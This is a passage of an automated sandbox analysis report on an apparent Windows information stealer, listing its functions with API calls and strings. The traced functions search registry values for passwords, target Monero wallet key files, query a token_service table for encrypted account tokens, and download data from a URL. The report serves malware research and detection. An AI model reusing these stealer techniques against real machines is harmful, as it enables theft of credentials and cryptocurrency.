                  Function 002A72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002A73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 002A740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002A7452
                  • HeapFree.KERNEL32(00000000), ref: 002A7459
                  • task.LIBCPMTD ref: 002A7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: 3503e56350c3979d9f8b9f1ebea1c4074ef3e4ef4ae5f873c053c8b43821c82e
                  • Instruction ID: 1f099a45fcdaf8946bee62946e6f3278731367e18e864f469b14c4a7853fa30b
                  • Opcode Fuzzy Hash: 3503e56350c3979d9f8b9f1ebea1c4074ef3e4ef4ae5f873c053c8b43821c82e
                  • Instruction Fuzzy Hash: 09614CB5D201589BDB24DF50CC45BDAB7B8BF49300F0081E9E649A6141EFB06BD9CFA5
                  Function 002ABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  • lstrlen.KERNEL32(00000000), ref: 002ABC9F
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 002ABCCD
                  • lstrlen.KERNEL32(00000000), ref: 002ABDA5
                  • lstrlen.KERNEL32(00000000), ref: 002ABDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: fc20c681ce9fa05fddc504cd21943fa7fbb0948a8ee3bbecb3f4543e7511ed73
                  • Instruction ID: 23032a3c35bb65a38b5ed7035896d35f9069b881d5d0eca4f9a7212de3da22d5
                  • Opcode Fuzzy Hash: fc20c681ce9fa05fddc504cd21943fa7fbb0948a8ee3bbecb3f4543e7511ed73
                  • Instruction Fuzzy Hash: F1B12F71920108ABDB14FBA0DD96EEE7338AF55340F404568F506B7492EF346A69CFA2
                  Function 002B6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 751f92b554115f3ff36f1d4d6151ca079cacb8011425c51f4c9a3e548f669383
                  • Instruction ID: 6f0ef3280c3410b153798692b7ae98fe54bd92d809d526d1b6fa54f2ec75ce5b
                  • Opcode Fuzzy Hash: 751f92b554115f3ff36f1d4d6151ca079cacb8011425c51f4c9a3e548f669383
                  • Instruction Fuzzy Hash: 75F08934904289EFD344DFE0E94D76CBB70FB04703F0401A8F6058A2D1DA749B61DB9A
                  Function 002A4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002A4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A4FD1
                  • InternetOpenA.WININET(002C0DDF,00000000,00000000,00000000,00000000), ref: 002A4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 002A5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 002A5041
                  • InternetCloseHandle.WININET(?), ref: 002A50B9
                  • InternetCloseHandle.WININET(?), ref: 002A50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 67e51deff26dffc159b1432f7aabe1efbb59eef8a743f1d08b396ce47273d2b1
                  • Instruction ID: f6eae36b4310afc10691590f51c6f9fcd00803d9e93051b2922c756aeb4928a7
                  • Opcode Fuzzy Hash: 67e51deff26dffc159b1432f7aabe1efbb59eef8a743f1d08b396ce47273d2b1
                  • Instruction Fuzzy Hash: 3E31F8B4A10218ABDB20CF54DC85BDDB7B4FB48704F5081E9F709A7281DB706AD58F99
                  Function 002B83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002B8426
                  • wsprintfA.USER32 ref: 002B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B8499
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                  • RegQueryValueExA.ADVAPI32(00000000,00D5F6C8,00000000,000F003F,?,00000400), ref: 002B84EC
                  • lstrlen.KERNEL32(?), ref: 002B8501
                  • RegQueryValueExA.ADVAPI32(00000000,00D5F770,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,002C0B34), ref: 002B8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 9b45ade37e63f36b40d00606954512bc606d6febedb4b6b832e1463f12af02cc
                  • Instruction ID: a6349181ad843d11778b2ba2c6a303e48e9986aa0bb604092f557bd58a8593ab
                  • Opcode Fuzzy Hash: 9b45ade37e63f36b40d00606954512bc606d6febedb4b6b832e1463f12af02cc
                  • Instruction Fuzzy Hash: BA21E971910228ABDB24DF54DC85FE9B7B8FB48704F00C5E8E609A6141DF71AA95CFE4
                  Function 002B7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,00D4BBF8,00000000,00020119,00000000), ref: 002B76DD
                  • RegQueryValueExA.ADVAPI32(00000000,00D5F5F0,00000000,00000000,?,000000FF), ref: 002B76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 002B7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: eb1fa53144b2e736c3a2817190ec2514818f0d26e4f26eabf72774954dae9a1f
                  • Instruction ID: 2629baa54a04e664e5a2d2cd12d6fd8e4d63aa513d0bffe12b09db69fe2b5977
                  • Opcode Fuzzy Hash: eb1fa53144b2e736c3a2817190ec2514818f0d26e4f26eabf72774954dae9a1f
                  • Instruction Fuzzy Hash: 740162B5A14208BBD700EBE4DC89FADB7BCEB48701F104164FA05DB292DA70A9249B55
                  Function 002B7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B773B
                  • RegOpenKeyExA.ADVAPI32(80000002,00D4BBF8,00000000,00020119,002B76B9), ref: 002B775B
                  • RegQueryValueExA.ADVAPI32(002B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 002B777A
                  • RegCloseKey.ADVAPI32(002B76B9), ref: 002B7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 900b7275e0d170b225efaab0ed1246b6760d020bea58f1d11194cccca3a931a6
                  • Instruction ID: 6283fa828023873884759fbf05c495af9ece3d4a80ac702137426fbd7d9c166e
                  • Opcode Fuzzy Hash: 900b7275e0d170b225efaab0ed1246b6760d020bea58f1d11194cccca3a931a6
                  • Instruction Fuzzy Hash: 070167B5A40308BBDB10DFE0DC89FAEB7B8FB44700F004158FA05AB281DA70A510CF55
                  Function 002B92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(:+,80000000,00000003,00000000,00000003,00000080,00000000,?,002B3AEE,?), ref: 002B92FC
                  • GetFileSizeEx.KERNEL32(000000FF,:+), ref: 002B9319
                  • CloseHandle.KERNEL32(000000FF), ref: 002B9327
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID: :+$:+
                  • API String ID: 1378416451-4145033400
                  • Opcode ID: da1d172b639e54c809b96bbfcc453cf0569161341183613950ccadbf1132b57f
                  • Instruction ID: 7a5df88872d82bed0e38b1ea4ff2524781694870feea0ea2874f9caf25df2ac8
                  • Opcode Fuzzy Hash: da1d172b639e54c809b96bbfcc453cf0569161341183613950ccadbf1132b57f
                  • Instruction Fuzzy Hash: BBF03C75E54208BBDB10DFB0DC49B9E77F9AB48750F10C2A4F651AB2C0D670A6518B54
                  Function 002A99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                  • LocalFree.KERNEL32(002A148F), ref: 002A9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 5872a7c3c18f8a9d53c318d15af2de761d62d29e128c8a8b5fb93050e286d4bb
                  • Instruction ID: f44cffe2b71ee379fe407f3db2236ad2929749409f6ea4b9f9a9d58de531915f
                  • Opcode Fuzzy Hash: 5872a7c3c18f8a9d53c318d15af2de761d62d29e128c8a8b5fb93050e286d4bb
                  • Instruction Fuzzy Hash: 39316FB4A10209EFDF10CF95C885BEE77B5FF49340F108159E815AB291CB74A991CFA1
                  Function 002B4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,00D5F1D0), ref: 002B47DB
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4801
                  • lstrcat.KERNEL32(?,?), ref: 002B4820
                  • lstrcat.KERNEL32(?,?), ref: 002B4834
                  • lstrcat.KERNEL32(?,00D4A568), ref: 002B4847
                  • lstrcat.KERNEL32(?,?), ref: 002B485B
                  • lstrcat.KERNEL32(?,00D5E248), ref: 002B486F
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002B8D90: GetFileAttributesA.KERNEL32(00000000,?,002A1B54,?,?,002C564C,?,?,002C0E1F), ref: 002B8D9F
                    • Part of subcall function 002B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002B4580
                    • Part of subcall function 002B4570: RtlAllocateHeap.NTDLL(00000000), ref: 002B4587
                    • Part of subcall function 002B4570: wsprintfA.USER32 ref: 002B45A6
                    • Part of subcall function 002B4570: FindFirstFileA.KERNEL32(?,?), ref: 002B45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
